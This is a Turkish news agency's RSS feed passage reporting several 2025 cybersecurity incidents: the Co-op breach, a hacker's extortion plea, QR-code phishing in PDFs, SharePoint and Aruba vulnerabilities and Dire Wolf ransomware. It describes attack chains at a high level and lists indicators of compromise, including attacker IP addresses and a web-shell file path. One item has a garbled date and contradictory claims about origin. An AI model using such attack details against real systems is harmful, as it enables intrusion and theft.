<p data-start="1177" data-end="1697"><strong data-start="1177" data-end="1236">Saldırı zinciri: Sosyal mühendislik ve parola resetleme</strong><br data-start="1236" data-end="1239">Saldırının 22 Nisan 2025 tarihinde başladığı, tehdit aktörlerinin bir Co-op çalışanını hedef alan sosyal mühendislik yöntemiyle sisteme giriş yaptığı öğrenildi. Parolayı sıfırlayarak sisteme erişim sağlayan saldırganlar, daha sonra şirketin <strong data-start="1480" data-end="1508">Windows Active Directory</strong> veritabanı olan <strong data-start="1525" data-end="1537">NTDS.dit</strong> dosyasını ele geçirdi. Bu dosya, sistemdeki kullanıcı hesaplarının parola özetlerini içeriyor ve çevrimdışı şekilde kırılarak tüm ağa yayılmayı mümkün kılıyor.</p>
<p data-start="1699" data-end="2242"><strong data-start="1699" data-end="1760">DragonForce fidye yazılımı ve Scattered Spider bağlantısı</strong><br data-start="1760" data-end="1763">Saldırının ardından şirket birçok BT sistemini çevrimdışı hale getirmek zorunda kaldı. Yapılan ilk açıklamalarda olay "girişim niteliğinde" değerlendirilmişti. Ancak sonrasında önemli miktarda verinin sızdırıldığı doğrulandı. Siber güvenlik kaynakları, saldırının <strong data-start="2027" data-end="2046">Marks & Spencer</strong>’a yapılan ve <strong data-start="2060" data-end="2090">DragonForce fidye yazılımı</strong> kullanılan saldırıyla benzerlik gösterdiğini, saldırıların arkasında <strong data-start="2160" data-end="2180">Scattered Spider</strong> adlı grupla bağlantılı tehdit aktörlerinin olduğunu bildirdi.</p>
<p data-start="2244" data-end="2462">BBC, fidye yazılımı operatörü DragonForce ile iletişime geçtiklerini ve saldırının bir ortağı tarafından gerçekleştirildiğinin doğrulandığını aktardı. DragonForce, BBC ile Co-op’a ait bazı veri örneklerini de paylaştı.</p>
<p data-start="2464" data-end="2819"><strong data-start="2464" data-end="2498">NCA dört kişiyi gözaltına aldı</strong><br data-start="2498" data-end="2501">İngiltere Ulusal Suç Teşkilatı (NCA), Co-op ve Marks & Spencer saldırılarıyla bağlantılı olduğundan şüphelenilen <strong data-start="2614" data-end="2647">dördü genç toplam dört kişiyi</strong> geçtiğimiz hafta gözaltına aldı. Zanlılar arasında 17, 19 ve 20 yaşlarında kişilerin bulunduğu, gözaltıların Londra ve West Midlands bölgelerinde gerçekleştiği bildirildi.</p>
<p data-start="2821" data-end="3089">Bu kişilerden birinin, <strong data-start="2844" data-end="2959">2023 yılında MGM Resorts’a yönelik gerçekleştirilen ve 100’den fazla sanal sunucunun şifrelenmesiyle sonuçlanan</strong> fidye yazılımı saldırısıyla da bağlantılı olduğu iddia ediliyor. O saldırı da yine Scattered Spider grubuyla ilişkilendirilmişti.</p>
<p data-start="3091" data-end="3289">CEO Khoury-Haq, yaşanan veri ihlalini "kişisel bir saldırı" olarak değerlendirdi ve “Bu olay beni değil, çalışanlarımı ve üyelerimizi hedef aldı. Bu nedenle çok daha kişisel bir anlam taşıyor” dedi.</p>
<p data-start="3296" data-end="3449"><strong data-start="3296" data-end="3308"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD Ordusu mensubu eski asker, 10 teknoloji ve telekom şirketine siber şantajdan suçlu bulundu</title>
<link>https://www.ajansexpres.com.tr/abd-ordusu-mensubu-eski-asker-10-teknoloji-ve-telekom-sirketine-siber-santajdan-suclu-bulundu</link>
<guid>https://www.ajansexpres.com.tr/abd-ordusu-mensubu-eski-asker-10-teknoloji-ve-telekom-sirketine-siber-santajdan-suclu-bulundu</guid>
<description><![CDATA[ 21 yaşındaki eski ABD askeri Cameron John Wagenius, 2023-2024 yılları arasında AT&amp;T, Verizon ve sekiz farklı şirkete yönelik veri hırsızlığı ve fidye taleplerinden suçlu olduğunu kabul etti. Aktif görevdeyken gerçekleştirdiği eylemler için 27 yıla kadar hapis cezası isteniyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d3274fb7d.webp" length="35718" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:03 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Hangi şirketler hedef alındı, Wagenius kimlerle birlikte hareket etti, siber saldırılar nasıl gerçekleştirildi, cezası ne kadar olabilir</media:keywords>
<content:encoded><![CDATA[<p data-start="433" data-end="777">ABD Adalet Bakanlığı, eski bir Amerikan askeri olan <strong data-start="485" data-end="510">Cameron John Wagenius</strong>’un, ülke genelinde faaliyet gösteren en az <strong data-start="554" data-end="652">10 teknoloji ve telekomünikasyon şirketine siber saldırı düzenlediğini ve fidye talep ettiğini</strong> açıkladı. 21 yaşındaki Wagenius, 14 Temmuz 2025’te hakkında hazırlanan iddianamenin ardından <strong data-start="746" data-end="776">üç suçlamayı da kabul etti</strong>.</p>
<p data-start="779" data-end="1059">Wagenius, Texas’ta 20 Aralık 2024’te gözaltına alınmış, <strong data-start="835" data-end="882">gizli telefon kayıtlarının izinsiz aktarımı</strong> suçlamasıyla Washington Batı Bölgesi Mahkemesi’nde yargılanmaya başlamıştı. 2025 Şubat ayında ise AT&T ve Verizon’a yönelik hack eylemleriyle ilgili olarak da suçlu bulunmuştu.</p>
<p data-start="1061" data-end="1492"><strong data-start="1061" data-end="1101">Siber takma adlarla faaliyet yürüttü</strong><br data-start="1101" data-end="1104">Adalet Bakanlığı’na göre Wagenius, <strong data-start="1139" data-end="1173">“kiberphant0m”, “cyb3rph4nt0m”</strong> ve <strong data-start="1177" data-end="1192">“buttholio”</strong> gibi takma adlarla yeraltı siber forumlarında aktifti. 2023 Nisan – 2024 Aralık tarihleri arasında, diğer kişilerle birlikte çalışarak kurumlara ait sistem giriş bilgilerini ele geçirdi ve bu şirketlere ait verileri sızdırmakla tehdit ederek <strong data-start="1435" data-end="1491">500 bin ila 1 milyon dolar arasında fidye talep etti</strong>.</p>
<p data-start="1494" data-end="1663">Elde edilen bilgilere göre, ekip Telegram üzerinden organize oldu, çalınan parolaları paylaştı ve “SSH Brute” adlı özel bir saldırı aracıyla sistemlere erişim sağladı.</p>
<p data-start="1665" data-end="1896">Ayrıca <strong data-start="1672" data-end="1709">SIM kart kopyalama (SIM-swapping)</strong> yöntemleriyle de kullanıcı hesaplarına ulaşıldığı, çalınan verilerin bir kısmının çeşitli siber suç forumlarında satıldığı veya dolandırıcılık faaliyetlerinde kullanıldığı tespit edildi.</p>
<p data-start="1898" data-end="2238"><strong data-start="1898" data-end="1945">Fidye talepleri ve veri sızdırma tehditleri</strong><br data-start="1945" data-end="1948">Wagenius, mağdurlardan birine gönderdiği mesajda, <strong data-start="1998" data-end="2048">358 GB’lik veri sızıntısı tehdidinde bulunarak</strong> iletişime geçilmesini ve ödeme yapılmasını talep etti. Bir başka şirkete gönderdiği e-postada ise <strong data-start="2147" data-end="2186">500 bin dolar değerinde kripto para</strong> karşılığında verilerin sızdırılmayacağını belirtti.</p>
<p data-start="2240" data-end="2404">Yetkililer, Wagenius’un bu faaliyetleri <strong data-start="2280" data-end="2347">aktif görevdeyken, ABD Ordusu mensubu olarak gerçekleştirdiğini</strong> ve bu durumun davanın ağırlığını artırdığını ifade etti.</p>
<p data-start="2406" data-end="2677"><strong data-start="2406" data-end="2439">Ceza ekim ayında belli olacak</strong><br data-start="2439" data-end="2442">Wagenius hakkında hazırlanan son iddianamede, <strong data-start="2488" data-end="2569">bilişim dolandırıcılığına yönelik komplolar, ağır kimlik hırsızlığı ve şantaj</strong> suçlamaları yer alıyor. Kabul edilen tüm suçlamalar sonucunda <strong data-start="2632" data-end="2664">en fazla 27 yıl hapis cezası</strong> öngörülüyor.</p>
<p data-start="2679" data-end="2834">Mahkeme, daha önce telefon kayıtlarının yasa dışı aktarımı suçundan kabul edilen suçlar için de ek ceza verip vermeyeceğini <strong data-start="2803" data-end="2833">6 Ekim 2025’te açıklayacak</strong>.<strong data-start="2841" data-end="2853"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni Nesil QR Kodu Tuzağı: Masum PDF’lerle Gelen Büyük Tehlike! Kimlik Bilgilerinizi Böyle Çalıyorlar!</title>
<link>https://www.ajansexpres.com.tr/yeni-nesil-qr-kodu-tuzagi-masum-pdflerle-gelen-buyuk-tehlike-kimlik-bilgilerinizi-boeyle-caliyorlar</link>
<guid>https://www.ajansexpres.com.tr/yeni-nesil-qr-kodu-tuzagi-masum-pdflerle-gelen-buyuk-tehlike-kimlik-bilgilerinizi-boeyle-caliyorlar</guid>
<description><![CDATA[ Son dönemde siber güvenlik uzmanlarının dikkatini çeken “Scanception” adlı yeni bir saldırı türü, masum görünen PDF dosyaları içine gizlenmiş QR kodlarla kullanıcıların kimlik bilgilerini hedef alıyor. Bu yöntem, profesyonel görünümlü belgeler ve güvenli bağlantılarla kandırarak, e-posta ve şifre gibi bilgileri sessizce ele geçiriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d32308ffe.webp" length="24822" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:58 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>qr kodlarla kimlik bilgileriniz çalınabilir mi, scanception saldırısı nedir ve nasıl çalışır, pdf belgeleri neden artık güvenli değil bu saldırılardan nasıl korunabiliriz, şirketler qr kodla gelen tehditlere hazır mı</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik dünyasında yeni bir tehdit kapıda: <strong>Scanception saldırısı</strong>. Son dönemde artış gösteren bu saldırı türü, özellikle kurumsal çalışanları hedef alıyor. Masum görünümlü PDF dosyalarına yerleştirilen QR kodlar sayesinde kullanıcıların bilgileri çalınıyor.</p>
<p>İlk olarak <strong>2024’ün sonlarında</strong> fark edilen bu yöntem, <strong>2025 ortalarında</strong> çok sayıda ülkede gözlemlenmeye başladı. Özellikle <strong>ABD, Avrupa ve Türkiye</strong>'deki bazı kurumlara yönelik kampanyalarda bu yöntem kullanıldı.</p>
<p>Saldırıların ana hedefinde:</p>
<ul>
<li>Şirket çalışanları</li>
<li>Kurumsal e-posta kullanıcıları</li>
<li>İnsan kaynakları ve muhasebe departmanları</li>
</ul>
<p>bulunuyor. Ancak bu yöntem, genel kullanıcıları da tuzağa düşürebilecek kadar etkili.</p>
<p>Saldırganlar profesyonel olarak hazırlanmış PDF dosyalarının <strong>son sayfasına</strong> bir <strong>zararlı QR kod</strong> yerleştiriyor. Bu kod:</p>
<ul>
<li>Google, YouTube gibi güvenilir siteler üzerinden yönlendirme yaparak güven kazanıyor.</li>
<li>Kullanıcıyı sahte giriş ekranlarına götürüyor ve <strong>e-posta/şifre</strong> bilgilerini çalıyor.</li>
<li>Güvenlik test araçları (Selenium, Burp Suite vb.) tespit edildiğinde, analizleri engellemek için <code>about:blank</code> sayfasına yönlendiriyor.</li>
</ul>
<p>Bu saldırı, klasik phishing yöntemlerinden çok daha sofistike:</p>
<ul>
<li>Güvenlik yazılımlarının çoğu <strong>ilk sayfayı taradığı için</strong> bu saldırı kolayca gözden kaçabiliyor.</li>
<li>PDF belgeleri <strong>resmi göründüğü için</strong> insanlar QR kodları gönül rahatlığıyla tarayabiliyor.</li>
<li>Güvenli servisler üzerinden yapılan yönlendirmeler <strong>güven algısını artırıyor</strong>.</li>
</ul>
<p>Uzmanlar, bu tür saldırıların daha da yaygınlaşabileceği konusunda uyarıyor. Kurumların çalışanlarına <strong>QR kod okutmadan önce içeriğin doğruluğunu sorgulama eğitimi</strong> vermesi gerektiğini vurguluyorlar.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft SharePoint sıfır gün açığı saldırılarda kullanılıyor: 29 kuruma sızıldı, yama henüz yayımlanmadı</title>
<link>https://www.ajansexpres.com.tr/microsoft-sharepoint-sifir-gun-acigi-saldirilarda-kullaniliyor-29-kuruma-sizildi-yama-henuz-yayimlanmadi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-sharepoint-sifir-gun-acigi-saldirilarda-kullaniliyor-29-kuruma-sizildi-yama-henuz-yayimlanmadi</guid>
<description><![CDATA[ Microsoft, SharePoint Server yazılımında tespit edilen ve halen aktif şekilde istismar edilen kritik bir sıfır gün açığına karşı uyarıda bulundu. CVE-2025-53770 kodlu açıklık için henüz güvenlik güncellemesi bulunmuyor; dünya genelinde 85&#039;ten fazla sunucunun ele geçirildiği ve aralarında çok uluslu şirketler ile kamu kurumlarının da olduğu 29 kuruma sızıldığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d31ee45ab.webp" length="40888" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:54 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft SharePoint sıfır gün açığı nasıl çalışıyor, hangi kurumlar saldırılardan etkilendi, geçici güvenlik önlemleri neler, hangi sistemler risk altında bulunuyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="532" data-end="535">Microsoft, SharePoint Server ürününde bulunan ve aktif olarak istismar edilen kritik bir sıfır gün güvenlik açığını duyurdu. <em data-start="660" data-end="676">CVE-2025-53770</em> koduyla takip edilen açık, yerel sunucularda çalışan SharePoint sistemlerini etkiliyor. Microsoft 365 hizmeti bu açıklıktan etkilenmiyor.</p>
<p></p>
<p data-start="816" data-end="1155">Söz konusu zafiyet, daha önce <em data-start="846" data-end="867">Pwn2Own Berlin 2025</em> etkinliğinde gösterilen ve "ToolShell" olarak adlandırılan saldırı zincirinin bir varyantı olarak değerlendiriliyor. Orijinal zincirde yer alan <em data-start="1012" data-end="1028">CVE-2025-49706</em> ve <em data-start="1032" data-end="1048">CVE-2025-49704</em> kodlu açıklıklar Temmuz yamasıyla kapatılmış olsa da, benzer bir teknikle çalışan yeni açık tespit edildi.</p>
<p data-start="1157" data-end="1445">Microsoft’un açıklamasına göre, saldırganlar bu zafiyet yoluyla sunucuya bir <code data-start="1234" data-end="1241">.aspx</code> dosyası yükleyerek uzaktan kod çalıştırma (RCE) gerçekleştirebiliyor. Bu işlem sırasında, SharePoint sunucusuna ait kriptografik anahtarlar ele geçirilerek sistem üzerinde yetkili işlemler yapılabiliyor.</p>
<p data-start="1447" data-end="1817"><strong data-start="1447" data-end="1500">85'ten fazla sunucu tehlikede, 29 kurum etkilendi</strong><br data-start="1500" data-end="1503">Saldırı ilk olarak Hollanda merkezli siber güvenlik firması <em data-start="1563" data-end="1577">Eye Security</em> tarafından 18 Temmuz’da fark edildi. Firmanın açıklamasına göre, saldırılarda “spinstall0.aspx” adlı zararlı bir dosya kullanılarak SharePoint sunucularının yapılandırma dosyalarındaki ValidationKey ve DecryptionKey bilgileri sızdırılıyor.</p>
<p data-start="1819" data-end="2084">Eye Security CTO’su Piet Kerkhofs, saldırıların dünya çapında 85'ten fazla sunucuyu etkilediğini, yapılan kümeleme çalışmaları sonucunda ise <em data-start="1960" data-end="1998">29 kurumun doğrudan hedef alındığını</em> açıkladı. Bu kurumlar arasında çok uluslu şirketler ve devlet kurumları da bulunuyor.</p>
<p data-start="2086" data-end="2394"><strong data-start="2086" data-end="2128">Henüz yama yok, geçici önlem önerileri</strong><br data-start="2128" data-end="2131">Microsoft, açığa yönelik resmi bir güvenlik yaması yayımlanmadığını belirtti. Geçici önlem olarak, <em data-start="2230" data-end="2265">AMSI (Antimalware Scan Interface)</em> entegrasyonunun aktif hale getirilmesi ve tüm SharePoint sunucularında <em data-start="2337" data-end="2357">Defender Antivirus</em> kurulmasının önerildiği bildirildi.</p>
<p data-start="2396" data-end="2711">Bu özellik, Eylül 2023’ten itibaren yayımlanan güvenlik güncellemeleriyle varsayılan olarak etkinleştirilmiş durumda. Ancak manuel kurulum yapan ya da güncelleme almayan sistemlerde etkin olmayabileceği belirtiliyor. Microsoft, AMSI etkinleştirilemeyen sistemlerin internet bağlantısının kesilmesini tavsiye ediyor.</p>
<p data-start="2713" data-end="2875"><strong data-start="2713" data-end="2756">İhlal tespit yöntemleri ve göstergeleri</strong><br data-start="2756" data-end="2759">Microsoft ve Eye Security, saldırıya uğrayan sistemleri tespit edebilmek için aşağıdaki Göstergeleri (IOC) paylaştı:</p>
<ul data-start="2877" data-end="3237">
<li data-start="2877" data-end="3006">
<p data-start="2879" data-end="3006"><code data-start="2879" data-end="2985">C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</code> dosyasının varlığı</p>
</li>
<li data-start="3007" data-end="3085">
<p data-start="3009" data-end="3085">IIS loglarında <code data-start="3024" data-end="3052">/_layouts/15/ToolPane.aspx</code> adresine POST isteği yapılması</p>
</li>
<li data-start="3086" data-end="3145">
<p data-start="3088" data-end="3145">HTTP Referer bilgisinin <code data-start="3112" data-end="3136">/_layouts/SignOut.aspx</code> olması</p>
</li>
<li data-start="3146" data-end="3237">
<p data-start="3148" data-end="3237">Şu IP adreslerinden gelen bağlantılar: <code data-start="3187" data-end="3202">107.191.58.76</code>, <code data-start="3204" data-end="3221">104.238.159.149</code>, <code data-start="3223" data-end="3237">96.9.125.147</code></p>
</li>
</ul>
<p data-start="3239" data-end="3406">Bu belirtilere rastlanan sistemlerin derhal ağ bağlantısının kesilmesi, sistemlerin çevrimdışı alınması ve kapsamlı güvenlik analizleri yapılması gerektiği vurgulandı.</p>
<p data-start="3408" data-end="3570">Uzmanlar, bazı güvenlik duvarlarının bu saldırıları durdurabildiğini belirtse de, imza tabanlı korumanın aşılması halinde yayılımın artabileceğine dikkat çekiyor.</p>
<p data-start="3572" data-end="3754"><strong data-start="3572" data-end="3584"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>HPE, Aruba erişim noktalarında kritik güvenlik açığı uyarısı yaptı: Saldırganlar cihazlara yönetici olarak sızabilir</title>
<link>https://www.ajansexpres.com.tr/hpe-aruba-erisim-noktalarinda-kritik-guvenlik-acigi-uyarisi-yapti-saldirganlar-cihazlara-yoenetici-olarak-sizabilir</link>
<guid>https://www.ajansexpres.com.tr/hpe-aruba-erisim-noktalarinda-kritik-guvenlik-acigi-uyarisi-yapti-saldirganlar-cihazlara-yoenetici-olarak-sizabilir</guid>
<description><![CDATA[ Hewlett-Packard Enterprise (HPE), Aruba Instant On erişim noktalarında bulunan ve yönetici erişimini mümkün kılan sabitlenmiş kimlik bilgileri nedeniyle kullanıcıları acil yazılım güncellemesine çağırdı. Kritik seviyede değerlendirilen zafiyet, uzaktan erişimle cihazların tam kontrolünü ele geçirme riski taşıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d31ab3ac4.webp" length="35828" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Aruba erişim noktalarında hangi güvenlik açıkları tespit edildi, sabitlenmiş giriş bilgileri ne tür riskler oluşturuyor, komut enjeksiyonu zafiyeti nasıl kullanılabilir, kullanıcılar bu açıklara karşı ne yapmalı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="483" data-end="486">Hewlett-Packard Enterprise (HPE), küçük ve orta ölçekli işletmelere yönelik geliştirilen Aruba Instant On kablosuz erişim noktalarında tespit edilen kritik bir güvenlik açığına karşı kullanıcıları uyardı.</p>
<p></p>
<p data-start="692" data-end="1017"><em data-start="692" data-end="708">CVE-2025-37103</em> olarak takip edilen bu açık, ürünlerde sabitlenmiş (hardcoded) yönetici giriş bilgilerinin bulunduğunu ortaya koyuyor. HPE tarafından yayımlanan güvenlik bültenine göre, saldırganlar bu bilgiler aracılığıyla kimlik doğrulama süreçlerini atlayabiliyor ve cihazların web arayüzüne yönetici olarak erişebiliyor.</p>
<p data-start="1019" data-end="1223">Açığın etkililik seviyesi <em data-start="1045" data-end="1053">kritik</em> olarak tanımlandı ve <em data-start="1075" data-end="1086">CVSS v3.1</em> puanı 9.8 olarak belirlendi. Zafiyet, <em data-start="1125" data-end="1153">3.2.0.1 ve daha eski sürüm</em> yazılımları çalıştıran Instant On Access Point modellerini etkiliyor.</p>
<p data-start="1225" data-end="1474">HPE bülteninde şu ifadeye yer verdi:<br data-start="1261" data-end="1264">“Yazılıma gömülü giriş bilgilerinin varlığı, cihazlara kimlik doğrulama olmaksızın erişim sağlanmasına yol açmaktadır. Bu da uzaktaki bir saldırganın sistemi yönetici yetkileriyle kontrol etmesine imkan tanır.”</p>
<p data-start="1476" data-end="1659">Bu zafiyetin keşfi, Ubisectech Sirius Team üyesi ve <em data-start="1528" data-end="1532">ZZ</em> takma adını kullanan bir güvenlik araştırmacısı tarafından gerçekleştirildi. Araştırmacı bulgularını doğrudan HPE’ye bildirdi.</p>
<p data-start="1661" data-end="1936">Saldırganların yönetici erişimi elde ettikten sonra erişim noktası ayarlarını değiştirebileceği, güvenlik yapılandırmalarını etkileyebileceği, arka kapılar kurabileceği, ağ trafiğini izleyerek gizli dinleme yapabileceği veya daha ileri sistemlere sızabileceği ifade ediliyor.</p>
<p data-start="1938" data-end="2297"><strong data-start="1938" data-end="2000">İkinci açık CLI üzerinden komut enjeksiyonuna izin veriyor</strong><br data-start="2000" data-end="2003">Aynı güvenlik bülteninde, HPE tarafından <em data-start="2044" data-end="2060">CVE-2025-37102</em> koduyla bildirilen ikinci bir zafiyet daha yer aldı. Bu açık, Aruba Instant On cihazlarının komut satırı arayüzünde (CLI) bulunan ve kimlik doğrulaması gerektiren yüksek seviyede tehlikeli bir komut enjeksiyonu zafiyetine işaret ediyor.</p>
<p data-start="2299" data-end="2614">Uzmanlara göre, bu açık birinci zafiyetle zincirleme kullanılabilir. Yani saldırganlar önce sabitlenmiş bilgilerle yönetici erişimi elde edip, ardından CLI üzerinden zararlı komutlar yürütebilir. Bu durum veri sızdırma, güvenlik bileşenlerini devre dışı bırakma ve kalıcı erişim sağlama gibi sonuçlara yol açabilir.</p>
<p data-start="2616" data-end="2779">Her iki zafiyetin çözümü için, cihazların <em data-start="2658" data-end="2682">3.2.1.0 veya daha yeni</em> bir yazılım sürümüne güncellenmesi gerektiği belirtildi. HPE, herhangi bir geçici çözüm sunmadı.</p>
<p data-start="2781" data-end="3007">Şirket, şu ana kadar bu açıklardan yararlanıldığına dair herhangi bir kötüye kullanım bildirimi almadığını ifade etti. Ancak, durumun hızla değişebileceği ve güvenlik yamalarının derhal uygulanmasının önem taşıdığı vurgulandı.</p>
<p data-start="3009" data-end="3237"><strong data-start="3009" data-end="3021"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni Siber Tehdit: Dire Wolf Ransomware 500 Bin Dolarla Vuruyor!</title>
<link>https://www.ajansexpres.com.tr/yeni-siber-tehdit-dire-wolf-ransomware-500-bin-dolarla-vuruyor</link>
<guid>https://www.ajansexpres.com.tr/yeni-siber-tehdit-dire-wolf-ransomware-500-bin-dolarla-vuruyor</guid>
<description><![CDATA[ Dire Wolf ransomware grubu, 2025&#039;te ortaya çıkarak 11 ülkede 16 kurumu hedef aldı. Kişiye özel fidye notları ve 500.000$ taleplerle dikkat çeken grup, gelişmiş şifreleme teknikleriyle öne çıkıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d316b56bd.webp" length="34964" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:46 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>dire wolf grubu, fidye yazılımlarında yeni bir dönemi başlatıyor olabilir. yüksek kazanç odaklı, hedefe özel ve psikolojik baskı gücü yüksek yapılarıyla dikkat çekiyorlar.</media:keywords>
<content:encoded><![CDATA[<h1> Yeni Siber Tehdit: Dire Wolf Ransomware 500 Bin Dolarla Şirketleri Vuruyor!</h1>
<p><br>Mayıs 2025’te siber güvenlik uzmanlarının keşfettiği <strong>Dire Wolf fidye yazılımı grubu</strong>, şimdiden <strong>11 ülkede 16 kurumu</strong> hedef aldı. Grup, kurbanlarına özel notlar bırakıp kişisel iletişim kurarak ortalama <strong>500 bin dolarlık fidyeler</strong> talep ediyor.</p>
<p>Grup ilk kez <strong>Mayıs 2025Haziran-Temmuz 2025</strong> arasında Türkiye'den kaynaklandı.</p>
<p>Saldırılar; <strong>ABD, Tayland, Türkiye</strong> gibi toplam 11 ülkeyi kapsıyor. En çok hedef alınan sektörler ise <strong>teknoloji</strong> ve <strong>üretim</strong> alanında faaliyet gösteren şirketler.</p>
<p>Dire Wolf, <em>double extortion</em> yani <strong>çifte sömürü</strong> yöntemi kullanıyor. Verileri hem şifreliyor hem de çalıyor. Saldırılarında şu teknikleri uyguluyor:</p>
<ul>
<li>Golang ile yazılmış fidye yazılımı</li>
<li>UPX ile paketlenmiş, analizi zor</li>
<li><strong>Curve25519</strong> + <strong>ChaCha20</strong> şifreleme</li>
<li>75 sistem servis ve 59 uygulamayı durdurma</li>
<li>Antivirüsleri etkisizleştirme (Sophos, Symantec, vb.)</li>
<li>Windows loglarını ve geri yükleme noktalarını silme</li>
</ul>
<p><strong></strong><br>Dire Wolf’un amacı <strong>sadece para kazanmak</strong>. Grup herhangi bir politik mesaj vermiyor. Yüksek fidye talepleriyle <strong>"az ama öz saldırı" stratejisi</strong> izliyor. Uzmanlara göre bu taktik, <strong>İsrail’in nokta atışı operasyonlarına benzer</strong> biçimde profesyonelce yürütülüyor.</p>
<p>Grubun kimliği henüz bilinmiyor. Ancak kurbanlara özel yazışmalar yapmaları, ileri düzey <strong>sosyal mühendislik bilgisine</strong> sahip olduklarını gösteriyor. Her kuruma özel notlar ve doğrudan iletişim kanalları oluşturuluyor.</p>
<h2> Kurumlar Ne Yapmalı?</h2>
<ul>
<li>Yedekleri offline ortamda saklayın</li>
<li>Antivirüs sistemlerini güncel tutun</li>
<li>Şüpheli e-postalara karşı personeli eğitin</li>
<li>Sistem loglarını izleyin</li>
<li>Geri yükleme noktalarını koruyun</li>
</ul><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft SharePoint sistemlerinde tespit edilen iki yeni sıfır gün açığı için acil yama yayınladı</title>
<link>https://www.ajansexpres.com.tr/microsoft-sharepoint-sistemlerinde-tespit-edilen-iki-yeni-sifir-gun-acigi-icin-acil-yama-yayinladi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-sharepoint-sistemlerinde-tespit-edilen-iki-yeni-sifir-gun-acigi-icin-acil-yama-yayinladi</guid>
<description><![CDATA[ Microsoft, SharePoint sunucularını hedef alan &quot;ToolShell&quot; saldırılarında kullanılan ve daha önceki yamaları atlatan iki kritik güvenlik açığına karşı acil güncelleme yayınladı. Güncellemelerin ardından sistem yöneticilerinin makine anahtarlarını döndürmesi ve log dosyalarını kontrol etmesi tavsiye ediliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d3129faab.webp" length="39360" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:42 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>SharePoint güncellemeleri hangi açıkları kapatıyor, hangi sürümler için yamalar yayınlandı, sistem yöneticileri hangi adımları izlemeli, saldırılardan kaç kurum etkilendi</media:keywords>
<content:encoded><![CDATA[<h1>Microsoft SharePoint için Acil Güvenlik Güncellemeleri Yayınlandı</h1>
<p>Microsoft, SharePoint yazılımında tespit edilen ve dünya genelinde aktif olarak kötüye kullanılan iki sıfır gün (zero-day) açığı için acil güvenlik güncellemeleri yayınladı. Açıklar, <strong>CVE-2025-53770</strong> ve <strong>CVE-2025-53771</strong> kodlarıyla takip ediliyor.</p>
<h2>ToolShell Saldırı Zinciri ve Pwn2Own Yarışması</h2>
<p>Mayıs ayında Berlin'de düzenlenen Pwn2Own güvenlik yarışmasında araştırmacılar, <strong>"ToolShell"</strong> olarak adlandırılan bir güvenlik zafiyeti zinciri aracılığıyla Microsoft SharePoint üzerinde uzaktan kod çalıştırma (RCE) gerçekleştirmeyi başarmıştı.</p>
<p>Bu zafiyetler Temmuz ayındaki Patch Tuesday kapsamında yamalanmış olsa da, saldırganlar bu güncellemeleri atlatan yeni açıklar keşfetti. Şu ana kadar dünya genelinde <strong>en az 54 kurum</strong> bu saldırılardan etkilenmiş durumda.</p>
<h2>Yayınlanan Güncellemeler</h2>
<p>Microsoft, SharePoint Subscription Edition ve SharePoint Server 2019 için CVE-2025-53770 ve CVE-2025-53771 açıklarını gideren acil yamaları paylaştı. SharePoint Server 2016 için ise yamaların <span>henüz hazır olmadığı</span> bildirildi.</p>
<ul>
<li><strong>SharePoint Server 2019:</strong> <code>KB5002754</code></li>
<li><strong>SharePoint Subscription Edition:</strong> <code>KB5002768</code></li>
</ul>
<h2>Makine Anahtarlarının Döndürülmesi Gerekiyor</h2>
<p>Güncellemeden sonra SharePoint sistemlerindeki makine anahtarlarının döndürülmesi öneriliyor. Bu işlem iki şekilde yapılabiliyor:</p>
<ol>
<li><strong>PowerShell ile:</strong> <code>Update-SPMachineKey</code></li>
<li><strong>Merkezi Yönetim Arayüzü:</strong> Central Administration → Monitoring → Review job definition → <em>Machine Key Rotation Job</em> → <strong>Run Now</strong></li>
</ol>
<p>İşlem sonrası tüm SharePoint sunucularında <code>iisreset.exe</code> komutu ile IIS yeniden başlatılmalı.</p>
<h2>Kötü Amaçlı Dosya Belirtileri Kontrol Edilmeli</h2>
